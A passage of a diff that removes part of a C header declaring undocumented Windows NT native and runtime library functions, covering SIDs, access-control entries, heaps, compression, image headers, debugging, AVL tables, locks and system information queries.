-RtlAddAccessAllowedObjectAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ ACCESS_MASK AccessMask,
- _In_opt_ GUID *ObjectTypeGuid,
- _In_opt_ GUID *InheritedObjectTypeGuid,
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAccessDeniedObjectAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ ACCESS_MASK AccessMask,
- _In_opt_ GUID *ObjectTypeGuid,
- _In_opt_ GUID *InheritedObjectTypeGuid,
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddAuditAccessObjectAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ ACCESS_MASK AccessMask,
- _In_opt_ GUID *ObjectTypeGuid,
- _In_opt_ GUID *InheritedObjectTypeGuid,
- _In_ PSID Sid,
- _In_ BOOLEAN AuditSuccess,
- _In_ BOOLEAN AuditFailure);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddCompoundAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ UCHAR AceType,
- 
_In_ ACCESS_MASK AccessMask,
- _In_ PSID ServerSid,
- _In_ PSID ClientSid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddMandatoryAce(
- _Inout_ PACL Acl,
- _In_ ULONG AceRevision,
- _In_ ULONG AceFlags,
- _In_ PSID Sid,
- _In_ UCHAR AceType,
- _In_ ACCESS_MASK AccessMask);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDefaultNpAcl(
- _Out_ PACL *Acl);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlLengthSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlMapGenericMask(
- _In_ PACCESS_MASK AccessMask,
- _In_ PGENERIC_MAPPING GenericMapping);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlValidSid(
- _In_ PSID Sid);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlEqualSid(
- _In_ PSID Sid1,
- _In_ PSID Sid2);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlEqualPrefixSid(
- _In_ PSID Sid1,
- _In_ PSID Sid2);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlLengthRequiredSid(
- _In_ ULONG SubAuthorityCount);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlFreeSid(
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAllocateAndInitializeSid(
- _In_ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,
- _In_ UCHAR SubAuthorityCount,
- _In_ ULONG SubAuthority0,
- _In_ ULONG SubAuthority1,
- _In_ ULONG SubAuthority2,
- _In_ ULONG SubAuthority3,
- _In_ ULONG SubAuthority4,
- _In_ ULONG SubAuthority5,
- _In_ ULONG SubAuthority6,
- _In_ ULONG SubAuthority7,
- _Out_ PSID *Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlInitializeSid(
- _Out_ PSID Sid,
- _In_ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,
- _In_ UCHAR SubAuthorityCount);
-
-NTSYSAPI
-PSID_IDENTIFIER_AUTHORITY
-NTAPI
-RtlIdentifierAuthoritySid(
- _In_ PSID Sid);
-
-NTSYSAPI
-PULONG
-NTAPI
-RtlSubAuthoritySid(
- _In_ PSID Sid,
- _In_ ULONG SubAuthority);
-
-NTSYSAPI
-PUCHAR
-NTAPI
-RtlSubAuthorityCountSid(
- _In_ PSID Sid);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlLengthSid(
- _In_ PSID Sid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCopySid(
- _In_ ULONG DestinationSidLength,
- _In_ PSID DestinationSid,
- _In_ PSID SourceSid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCopySidAndAttributesArray(
- _In_ ULONG ArrayLength,
- _In_ 
PSID_AND_ATTRIBUTES Source,
- _In_ ULONG TargetSidBufferSize,
- _Out_ PSID_AND_ATTRIBUTES TargetArrayElement,
- _Out_ PSID TargetSid,
- _Out_ PSID *NextTargetSid,
- _Out_ PULONG RemainingTargetSidBufferSize);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlLengthSidAsUnicodeString(
- _In_ PSID Sid,
- _Out_ PULONG StringLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlConvertSidToUnicodeString(
- _In_ PUNICODE_STRING UnicodeString,
- _In_ PSID Sid,
- _In_ BOOLEAN AllocateDestinationString);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateServiceSid(
- _In_ PUNICODE_STRING ServiceName,
- _Out_writes_bytes_opt_(*ServiceSidLength) PSID ServiceSid,
- _Inout_ PULONG ServiceSidLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _In_ ULONG Revision);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlSetOwnerSecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _In_ PSID Owner,
- _In_ BOOLEAN OwnerDefaulted);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCopySecurityDescriptor(
- _In_ PSECURITY_DESCRIPTOR InputSecurityDescriptor,
- _Out_ PSECURITY_DESCRIPTOR *OutputSecurityDescriptor);
-
-FORCEINLINE LUID NTAPI RtlConvertLongToLuid(
- _In_ LONG Long
-)
-{
- LUID TempLuid;
- LARGE_INTEGER TempLi;
-
- TempLi.QuadPart = Long;
- TempLuid.LowPart = TempLi.LowPart;
- TempLuid.HighPart = TempLi.HighPart;
- return(TempLuid);
-}
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlUniform(
- _Inout_ PULONG Seed);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlRandomEx(
- _Inout_ PULONG Seed);
-
-NTSYSAPI
-ULONG32
-NTAPI
-RtlComputeCrc32(
- _In_ ULONG32 PartialCrc,
- _In_ PVOID Buffer,
- _In_ ULONG Length);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAdjustPrivilege(
- _In_ ULONG Privilege,
- _In_ BOOLEAN Enable,
- _In_ BOOLEAN Client,
- _Out_ PBOOLEAN WasEnabled);
-
-/************************************************************************************
-*
-* RTL Version API. 
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetVersion(
- _Inout_ PRTL_OSVERSIONINFOW lpVersionInformation);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlGetNtVersionNumbers(
- _Out_opt_ PULONG MajorVersion,
- _Out_opt_ PULONG MinorVersion,
- _Out_opt_ PULONG BuildNumber);
-
-/************************************************************************************
-*
-* RTL Error Status API.
-*
-************************************************************************************/
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlNtStatusToDosError(
- _In_ NTSTATUS Status);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlSetLastWin32Error(
- _In_ LONG Win32Error);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetLastNtStatus(
- VOID);
-
-NTSYSAPI
-LONG
-NTAPI
-RtlGetLastWin32Error(
- VOID);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlNtStatusToDosErrorNoTeb(
- _In_ NTSTATUS Status);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlSetLastWin32ErrorAndNtStatusFromNtStatus(
- _In_ NTSTATUS Status);
-
-/************************************************************************************
-*
-* RTL WOW64 Support API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlWow64EnableFsRedirection(
- _In_ BOOLEAN Wow64FsEnableRedirection);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlWow64EnableFsRedirectionEx(
- _In_ PVOID DisableFsRedirection,
- _Out_ PVOID *OldFsRedirectionLevel);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlWow64GetThreadContext(
- _In_ HANDLE ThreadHandle,
- _Inout_ PWOW64_CONTEXT ThreadContext);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlWow64SetThreadContext(
- _In_ HANDLE ThreadHandle,
- _In_ PWOW64_CONTEXT ThreadContext);
-
-/************************************************************************************
-*
-* RTL Heap Management API. 
-*
-************************************************************************************/
-
-typedef NTSTATUS(NTAPI * PRTL_HEAP_COMMIT_ROUTINE)(
- _In_ PVOID Base,
- _Inout_ PVOID *CommitAddress,
- _Inout_ PSIZE_T CommitSize
- );
-
-typedef struct _RTL_HEAP_PARAMETERS {
- ULONG Length;
- SIZE_T SegmentReserve;
- SIZE_T SegmentCommit;
- SIZE_T DeCommitFreeBlockThreshold;
- SIZE_T DeCommitTotalFreeThreshold;
- SIZE_T MaximumAllocationSize;
- SIZE_T VirtualMemoryThreshold;
- SIZE_T InitialCommit;
- SIZE_T InitialReserve;
- PRTL_HEAP_COMMIT_ROUTINE CommitRoutine;
- SIZE_T Reserved[2];
-} RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS;
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlCreateHeap(
- _In_ ULONG Flags,
- _In_opt_ PVOID HeapBase,
- _In_opt_ SIZE_T ReserveSize,
- _In_opt_ SIZE_T CommitSize,
- _In_opt_ PVOID Lock,
- _In_opt_ PRTL_HEAP_PARAMETERS Parameters);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlDestroyHeap(
- _In_ PVOID HeapHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlSetHeapInformation(
- _In_ PVOID HeapHandle,
- _In_ HEAP_INFORMATION_CLASS HeapInformationClass,
- _In_opt_ PVOID HeapInformation,
- _In_opt_ SIZE_T HeapInformationLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlQueryHeapInformation(
- _In_ PVOID HeapHandle,
- _In_ HEAP_INFORMATION_CLASS HeapInformationClass,
- _Out_opt_ PVOID HeapInformation,
- _In_opt_ SIZE_T HeapInformationLength,
- _Out_opt_ PSIZE_T ReturnLength);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlAllocateHeap(
- _In_ PVOID HeapHandle,
- _In_ ULONG Flags,
- _In_ SIZE_T Size);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlFreeHeap(
- _In_ PVOID HeapHandle,
- _In_ ULONG Flags,
- _In_ PVOID BaseAddress);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlZeroHeap(
- _In_ PVOID HeapHandle,
- _In_ ULONG Flags);
-
-NTSYSAPI
-SIZE_T
-NTAPI
-RtlSizeHeap(
- _In_ PVOID HeapHandle,
- _In_ ULONG Flags,
- _In_ PVOID BaseAddress);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlProtectHeap(
- _In_ PVOID HeapHandle,
- _In_ BOOLEAN MakeReadOnly);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlReAllocateHeap(
- _In_ PVOID HeapHandle,
- _In_ ULONG Flags,
- 
_Frees_ptr_opt_ PVOID BaseAddress,
- _In_ SIZE_T Size);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlGetProcessHeaps(
- _In_ ULONG NumberOfHeaps,
- _Out_ PVOID *ProcessHeaps);
-
-typedef NTSTATUS(NTAPI *PRTL_ENUM_HEAPS_ROUTINE)(
- _In_ PVOID HeapHandle,
- _In_ PVOID Parameter
- );
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlEnumProcessHeaps(
- _In_ PRTL_ENUM_HEAPS_ROUTINE EnumRoutine,
- _In_ PVOID Parameter);
-
-/************************************************************************************
-*
-* RTL Compression API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGetCompressionWorkSpaceSize(
- _In_ USHORT CompressionFormatAndEngine,
- _Out_ PULONG CompressBufferWorkSpaceSize,
- _Out_ PULONG CompressFragmentWorkSpaceSize);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCompressBuffer(
- _In_ USHORT CompressionFormatAndEngine,
- _In_reads_bytes_(UncompressedBufferSize) PUCHAR UncompressedBuffer,
- _In_ ULONG UncompressedBufferSize,
- _Out_writes_bytes_to_(CompressedBufferSize, *FinalCompressedSize) PUCHAR CompressedBuffer,
- _In_ ULONG CompressedBufferSize,
- _In_ ULONG UncompressedChunkSize,
- _Out_ PULONG FinalCompressedSize,
- _In_ PVOID WorkSpace);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDecompressBuffer(
- _In_ USHORT CompressionFormat,
- _Out_writes_bytes_to_(UncompressedBufferSize, *FinalUncompressedSize) PUCHAR UncompressedBuffer,
- _In_ ULONG UncompressedBufferSize,
- _In_reads_bytes_(CompressedBufferSize) PUCHAR CompressedBuffer,
- _In_ ULONG CompressedBufferSize,
- _Out_ PULONG FinalUncompressedSize);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDecompressBufferEx(
- _In_ USHORT CompressionFormat,
- _Out_writes_bytes_to_(UncompressedBufferSize, *FinalUncompressedSize) PUCHAR UncompressedBuffer,
- _In_ ULONG UncompressedBufferSize,
- _In_reads_bytes_(CompressedBufferSize) PUCHAR CompressedBuffer,
- _In_ ULONG CompressedBufferSize,
- _Out_ PULONG FinalUncompressedSize,
- _In_ PVOID WorkSpace);
-
-/************************************************************************************
-*
-* RTL Image API.
-*
-************************************************************************************/
-
-#define RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK (0x00000001)
-
-NTSYSAPI
-PIMAGE_NT_HEADERS
-NTAPI
-RtlImageNtHeader(
- _In_ PVOID Base);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlImageNtHeaderEx(
- _In_ ULONG Flags,
- _In_ PVOID Base,
- _In_ ULONG64 Size,
- _Out_ PIMAGE_NT_HEADERS * OutHeaders);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlAddressInSectionTable(
- _In_ PIMAGE_NT_HEADERS NtHeaders,
- _In_ PVOID BaseOfImage,
- _In_ ULONG VirtualAddress);
-
-NTSYSAPI
-PIMAGE_SECTION_HEADER
-NTAPI
-RtlSectionTableFromVirtualAddress(
- _In_ PIMAGE_NT_HEADERS NtHeaders,
- _In_ PVOID BaseOfImage,
- _In_ ULONG VirtualAddress);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlImageDirectoryEntryToData(
- _In_ PVOID BaseOfImage,
- _In_ BOOLEAN MappedAsImage,
- _In_ USHORT DirectoryEntry,
- _Out_ PULONG Size);
-
-NTSYSAPI
-PIMAGE_SECTION_HEADER
-NTAPI
-RtlImageRvaToSection(
- _In_ PIMAGE_NT_HEADERS NtHeaders,
- _In_ PVOID Base,
- _In_ ULONG Rva);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlImageRvaToVa(
- _In_ PIMAGE_NT_HEADERS NtHeaders,
- _In_ PVOID Base,
- _In_ ULONG Rva,
- _Inout_opt_ PIMAGE_SECTION_HEADER *LastRvaSection);
-
-/************************************************************************************
-*
-* RTL Time API. 
-*
-************************************************************************************/
-
-NTSYSAPI
-VOID
-NTAPI
-RtlSecondsSince1970ToTime(
- _In_ ULONG ElapsedSeconds,
- _Out_ PLARGE_INTEGER Time);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlSecondsSince1980ToTime(
- _In_ ULONG ElapsedSeconds,
- _Out_ PLARGE_INTEGER Time);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlTimeToSecondsSince1980(
- _In_ PLARGE_INTEGER Time,
- _Out_ PULONG ElapsedSeconds);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlTimeToTimeFields(
- _In_ PLARGE_INTEGER Time,
- _Out_ PTIME_FIELDS TimeFields);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlTimeFieldsToTime(
- _In_ PTIME_FIELDS TimeFields,
- _Out_ PLARGE_INTEGER Time);
-
-/************************************************************************************
-*
-* RTL Debug Support API.
-*
-************************************************************************************/
-
-NTSYSAPI
-ULONG
-STDAPIVCALLTYPE
-DbgPrint(
- _In_z_ _Printf_format_string_ PCH Format,
- ...);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-DbgQueryDebugFilterState(
- _In_ ULONG ComponentId,
- _In_ ULONG Level);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-DbgSetDebugFilterState(
- _In_ ULONG ComponentId,
- _In_ ULONG Level,
- _In_ BOOLEAN State);
-
-NTSYSAPI
-VOID
-NTAPI
-DbgUserBreakPoint(
- VOID);
-
-NTSYSAPI
-VOID
-NTAPI
-DbgBreakPoint(
- VOID);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-DbgUiConnectToDbg(
- VOID);
-
-NTSYSAPI
-VOID
-NTAPI
-DbgUiSetThreadDebugObject(
- _In_ HANDLE DebugObject);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-DbgUiContinue(
- _In_ PCLIENT_ID AppClientId,
- _In_ NTSTATUS ContinueStatus);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-DbgUiStopDebugging(
- _In_ HANDLE Process);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-DbgUiDebugActiveProcess(
- _In_ HANDLE Process);
-
-/************************************************************************************
-*
-* RTL AVL Tree API.
-*
-************************************************************************************/
-
-typedef enum _TABLE_SEARCH_RESULT {
- TableEmptyTree,
- TableFoundNode,
- TableInsertAsLeft,
- TableInsertAsRight
-} TABLE_SEARCH_RESULT;
-
-typedef enum _RTL_GENERIC_COMPARE_RESULTS {
- GenericLessThan,
- GenericGreaterThan,
- GenericEqual
-} RTL_GENERIC_COMPARE_RESULTS;
-
-//
-// Add an empty typedef so that functions can reference the
-// a pointer to the generic table struct before it is declared.
-//
-
-#if defined (__cplusplus)
-struct _RTL_AVL_TABLE;
-#else
-typedef struct _RTL_AVL_TABLE RTL_AVL_TABLE;
-typedef struct PRTL_AVL_TABLE *_RTL_AVL_TABLE;
-#endif
-
-typedef RTL_GENERIC_COMPARE_RESULTS(NTAPI *PRTL_AVL_COMPARE_ROUTINE)(
- _In_ struct _RTL_AVL_TABLE *Table,
- _In_ PVOID FirstStruct,
- _In_ PVOID SecondStruct
- );
-
-typedef PVOID(NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)(
- _In_ struct _RTL_AVL_TABLE *Table,
- _In_ ULONG ByteSize
- );
-
-typedef VOID(NTAPI *PRTL_AVL_FREE_ROUTINE)(
- _In_ struct _RTL_AVL_TABLE *Table,
- _In_ _Post_invalid_ PVOID Buffer
- );
-
-typedef NTSTATUS(NTAPI *PRTL_AVL_MATCH_FUNCTION)(
- _In_ struct _RTL_AVL_TABLE *Table,
- _In_ PVOID UserData,
- _In_ PVOID MatchData
- );
-
-typedef struct _RTL_BALANCED_LINKS {
- struct _RTL_BALANCED_LINKS *Parent;
- struct _RTL_BALANCED_LINKS *LeftChild;
- struct _RTL_BALANCED_LINKS *RightChild;
- CHAR Balance;
- UCHAR Reserved[3];
-} RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS;
-
-typedef struct _RTL_AVL_TABLE {
- RTL_BALANCED_LINKS BalancedRoot;
- PVOID OrderedPointer;
- ULONG WhichOrderedElement;
- ULONG NumberGenericTableElements;
- ULONG DepthOfTree;
- PRTL_BALANCED_LINKS RestartKey;
- ULONG DeleteCount;
- PRTL_AVL_COMPARE_ROUTINE CompareRoutine;
- PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;
- PRTL_AVL_FREE_ROUTINE FreeRoutine;
- PVOID TableContext;
-} RTL_AVL_TABLE, *PRTL_AVL_TABLE;
-
-NTSYSAPI
-VOID
-NTAPI
-RtlInitializeGenericTableAvl(
- _Out_ PRTL_AVL_TABLE Table,
- _In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine,
- _In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine,
- _In_ PRTL_AVL_FREE_ROUTINE FreeRoutine,
- _In_opt_ PVOID TableContext);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlInsertElementGenericTableAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_reads_bytes_(BufferSize) PVOID Buffer,
- _In_ CLONG BufferSize,
- _Out_opt_ PBOOLEAN NewElement);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlInsertElementGenericTableFullAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_reads_bytes_(BufferSize) PVOID Buffer,
- _In_ CLONG BufferSize,
- _Out_opt_ PBOOLEAN NewElement,
- _In_ PVOID NodeOrParent,
- _In_ TABLE_SEARCH_RESULT SearchResult);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlDeleteElementGenericTableAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_ PVOID Buffer);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlLookupElementGenericTableAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_ PVOID Buffer);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlLookupElementGenericTableFullAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_ PVOID Buffer,
- _Out_ PVOID *NodeOrParent,
- _Out_ TABLE_SEARCH_RESULT *SearchResult);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlEnumerateGenericTableAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_ BOOLEAN Restart);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlEnumerateGenericTableWithoutSplayingAvl(
- _In_ PRTL_AVL_TABLE Table,
- _Inout_ PVOID *RestartKey);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlLookupFirstMatchingElementGenericTableAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_ PVOID Buffer,
- _Out_ PVOID *RestartKey);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlEnumerateGenericTableLikeADirectory(
- _In_ PRTL_AVL_TABLE Table,
- _In_opt_ PRTL_AVL_MATCH_FUNCTION MatchFunction,
- _In_opt_ PVOID MatchData,
- _In_ ULONG NextFlag,
- _Inout_ PVOID *RestartKey,
- _Inout_ PULONG DeleteCount,
- _In_ PVOID Buffer);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlGetElementGenericTableAvl(
- _In_ PRTL_AVL_TABLE Table,
- _In_ ULONG I);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlNumberGenericTableElementsAvl(
- _In_ PRTL_AVL_TABLE Table);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlIsGenericTableEmptyAvl(
- _In_ PRTL_AVL_TABLE Table);
-
-/************************************************************************************
-*
-* RTL Critical Section Support API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlEnterCriticalSection(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlLeaveCriticalSection(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-LOGICAL
-NTAPI
-RtlIsCriticalSectionLocked(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-LOGICAL
-NTAPI
-RtlIsCriticalSectionLockedByThread(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlGetCriticalSectionRecursionCount(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-LOGICAL
-NTAPI
-RtlTryEnterCriticalSection(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlInitializeCriticalSection(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlEnableEarlyCriticalSectionEventCreation(
- VOID);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlInitializeCriticalSectionAndSpinCount(
- _In_ PRTL_CRITICAL_SECTION CriticalSection,
- _In_ ULONG SpinCount);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlSetCriticalSectionSpinCount(
- _In_ PRTL_CRITICAL_SECTION CriticalSection,
- _In_ ULONG SpinCount);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDeleteCriticalSection(
- _In_ PRTL_CRITICAL_SECTION CriticalSection);
-
-/************************************************************************************
-*
-* RTL SRW Lock Support API.
-*
-************************************************************************************/
-
-NTSYSAPI
-VOID
-NTAPI
-RtlInitializeSRWLock(
- _Out_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlAcquireSRWLockExclusive(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlAcquireSRWLockShared(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlReleaseSRWLockExclusive(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlReleaseSRWLockShared(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlTryAcquireSRWLockExclusive(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlTryAcquireSRWLockShared(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlAcquireReleaseSRWLockExclusive(
- _Inout_ PRTL_SRWLOCK SRWLock);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlUpdateClonedSRWLock(
- _Inout_ PRTL_SRWLOCK SRWLock,
- _In_ LOGICAL Shared);
-
-/************************************************************************************
-*
-* RTL UAC Support API.
-*
-************************************************************************************/
-
-#define DBG_FLAG_ELEVATION_ENABLED 1
-#define DBG_FLAG_VIRTUALIZATION_ENABLED 2
-#define DBG_FLAG_INSTALLER_DETECT_ENABLED 3
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlQueryElevationFlags(
- _Inout_ ULONG *ElevationFlags);
-
-/************************************************************************************
-*
-* RTL Misc Support API.
-*
-************************************************************************************/
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlDoesFileExists_U(
- _In_ PCWSTR FileName);
-
-/************************************************************************************
-*
-* RTL Boundary Descriptor API.
-*
-************************************************************************************/
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlCreateBoundaryDescriptor(
- _In_ PUNICODE_STRING Name,
- _In_ ULONG Flags);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlDeleteBoundaryDescriptor(
- _In_ PVOID BoundaryDescriptor);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddSIDToBoundaryDescriptor(
- _Inout_ PVOID *BoundaryDescriptor,
- _In_ PSID RequiredSid);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAddIntegrityLabelToBoundaryDescriptor(
- _Inout_ PVOID *BoundaryDescriptor,
- _In_ PSID IntegrityLabel);
-
-/************************************************************************************
-*
-* ETW API.
-*
-************************************************************************************/
-
-struct _EVENT_FILTER_DESCRIPTOR;
-
-typedef VOID(NTAPI *PENABLECALLBACK)(
- _In_ LPCGUID SourceId,
- _In_ ULONG IsEnabled,
- _In_ UCHAR Level,
- _In_ ULONGLONG MatchAnyKeyword,
- _In_ ULONGLONG MatchAllKeyword,
- _In_opt_ struct _EVENT_FILTER_DESCRIPTOR *FilterData,
- _Inout_opt_ PVOID CallbackContext
- );
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-EtwEventRegister(
- _In_ LPCGUID ProviderId,
- _In_opt_ PENABLECALLBACK EnableCallback,
- _In_opt_ PVOID CallbackContext,
- _Out_ PREGHANDLE RegHandle);
-
-/*
-** Runtime Library API END
-*/
-
-/*
-** Native API START
-*/
-
-/************************************************************************************
-*
-* System Information API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-WINAPI
-NtQuerySystemInformation(
- _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
- _Out_writes_bytes_opt_(SystemInformationLength) PVOID SystemInformation,
- _In_ ULONG SystemInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQuerySystemInformationEx(
- _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
- _In_reads_bytes_(InputBufferLength) PVOID InputBuffer,
- _In_ ULONG InputBufferLength,
- _Out_writes_bytes_opt_(SystemInformationLength) PVOID SystemInformation,
- _In_ ULONG SystemInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetSystemInformation(
- _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
- _In_reads_bytes_opt_(SystemInformationLength) PVOID SystemInformation,
- _In_ ULONG SystemInformationLength);
-
-/************************************************************************************
-*
-* Event (EventPair) API.
-*
-************************************************************************************/
-
-typedef enum _EVENT_INFORMATION_CLASS {
- EventBasicInformation
-} EVENT_INFORMATION_CLASS;
-
-typedef enum _EVENT_TYPE {
- NotificationEvent,
- SynchronizationEvent
-} EVENT_TYPE;
-
-typedef struct _EVENT_BASIC_INFORMATION {
- EVENT_TYPE EventType;
- LONG EventState;
-} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
